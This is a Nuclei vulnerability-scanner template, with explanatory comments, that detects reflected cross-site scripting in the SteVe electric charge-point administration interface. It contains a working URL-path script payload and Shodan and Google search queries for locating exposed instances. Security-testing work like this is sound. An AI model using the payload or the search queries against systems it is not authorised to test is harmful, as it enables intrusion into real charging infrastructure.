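# Nuclei template: detects reflected cross-site scripting on a SteVe
# (charge point administration) web interface.
#
# The request places a script payload in the URL path under /services/ and
# the matchers confirm that the payload comes back unencoded in an HTML page.
# A match shows reflection only; confirm the finding against the deployed
# instance before reporting it. The fix is server-side (encode the reflected
# path on output, or upgrade to a build that does).
id: steve-xss

info:
  name: SteVe - Cross-Site Scripting
  author: clem9669
  severity: medium
  description: |
    The aim of SteVe is to support the deployment and popularity of electric mobility. SteVe provides basic functions for the administration of charge points.
    This template checks whether a script payload placed in the request path under /services/ is returned unencoded in an HTML response, which indicates reflected cross-site scripting.
  reference:
    - https://github.com/steve-community/steve
  metadata:
    verified: true
    # Quoted so the embedded colon and double quotes stay literal text.
    shodan-query: 'http.title:"SteVe - Steckdosenverwaltung"'
    google-query: 'intitle:"SteVe - Steckdosenverwaltung"'
  tags: steve,xss,oss

requests:
  - method: GET
    # Two path prefixes are tried: the application mounted under /steve/ and
    # mounted at the web root.
    path:
      - '{{BaseURL}}/steve/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
      - '{{BaseURL}}/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'

    # Stop after the first path that matches, so a host is reported once.
    stop-at-first-match: true
    # All three matchers must hold. Together they cut false positives from
    # pages that echo the path encoded or serve it as non-HTML content.
    matchers-condition: and
    matchers:
      # The payload must appear decoded and unescaped in the body. The
      # trailing '/services/?stylesheet=1">' suggests the path is echoed into
      # an attribute of a generated link; confirm against a real response.
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>/services/?stylesheet=1">'

      # The response must be served as HTML, otherwise a browser would not
      # parse the reflected markup.
      - type: word
        part: header
        words:
          - "text/html"

      # Only a successful response counts; error pages are ignored.
      - type: status
        status:
          - 200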